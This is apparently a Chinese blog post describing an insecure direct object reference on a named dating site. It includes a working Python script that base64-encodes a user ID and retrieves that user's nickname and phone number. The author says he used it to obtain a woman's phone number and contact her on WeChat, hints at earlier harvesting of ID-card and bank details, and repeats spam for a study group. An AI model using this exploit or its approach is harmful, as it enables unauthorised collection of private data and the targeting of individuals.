答應了蛋蛋的文章一直沒空寫，主要也沒好的素材，平時有些有趣的挖洞經歷又總是懶得各種記錄截圖啥的

學習Python中有不明白推薦加入交流群
號：516107834
群裡有志同道合的小夥伴，互幫互助，
群裡有不錯的學習教程！

今天本來想寫篇技術專題，後來寫著寫著發現時間不夠了，

以後再繼續吧，臨時改了這篇，離下班就剩20分鐘，很匆忙，表格們將就將就...

0x00 :

首先是這麼一個網站： 高顏值社交圈

進去之後是上圖這樣的，裡面號稱高顏值交友社群，所有人只能傳素顏和未經修圖的圖片視訊進行人工稽核，

反正一句話就是：妹子多多

0x01:

具體你們自己去分析，我就直奔主題了，BurpSuite抓包：

從萬千請求中發現上圖這個包，返回資訊裡竟然帶了個人資訊

學習Python中有不明白推薦加入交流群
號：516107834
群裡有志同道合的小夥伴，互幫互助，
群裡有不錯的學習教程！

（注：其實我原始測試的時候，這裡是會返回使用者實名認證包括身份證、提現銀行卡、姓名等資訊的，提交後已修復，

但對方不認為手機號洩露有威脅故還存在）

上圖資料包請求的資料引數看上去像base64加密的，我們解碼試試：

很好，其實就是一個對方使用者的userid,這裡有兩個思路，迴圈遍歷id去提取所有使用者的身份資訊（使用者大概十多萬，你們猜修復前我有沒有~~嘿嘿嘿）

當然沒有，Onls出了名的正義，那麼我只想獲取單一某個心怡妹子的手機號加微信，python寫了個簡單指令碼如下：

#coding:utf-8
#!/usr/bin/python
import urllib
import base64
import urllib2
from urllib2 import URLError
import json
 
def getOther():
 id_ = raw_input("Enter OtherID: ")
 postdata = '{"data":{"userId":"%s"}}' % id_
 bytesString = postdata.encode("utf-8")
 encodestr = base64.b64encode(bytesString)
 decodestr = encodestr.decode()
 url='http://www.yanzhi.top/user/v1/otheruser.do'
 data = urllib.urlencode({'data': decodestr}) #這個是請求的時候帶的post引數，此處應該是json格式
 try:
 request = urllib2.Request(url)
 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
 response = opener.open(request, data)
 result = json.loads(response.read())
 userInfo=result[u'userInfo']
 userbase = result[u'userbase']
 spreadId = userInfo[u'spreadId']
 nickName = userbase[u'nickName']
 numberId = userbase[u'numberId']
 userMobile = userbase[u'userMobile']
 
 print 'nickName:%s,userMobile:%s,numberId:%s,spreadId:%s,numberId:%s
' % (nickName,userMobile,numberId,spreadId,numberId)
 except URLError, e:
 if hasattr(e,'reason'): #stands for URLError
 print "can not reach server,writing..."
 pass
 elif hasattr(e,'code'): #stands for HTTPError
 print "find http error, writing..."
 pass
 else: #stands for unknown error
 print "unknown error, writing..."
 pass
getOther()

0x02:

這裡我覺得這個妹子不錯，我在她主頁找到她的ID，然後執行指令碼：

微信搜尋手機號：

後面你們自己想象吧，老弟我趕時間呢..

後記：我這是已經提交漏洞，他們修復之後的結果，故對站點無碼。

至於之前的資訊..

emmmmmm...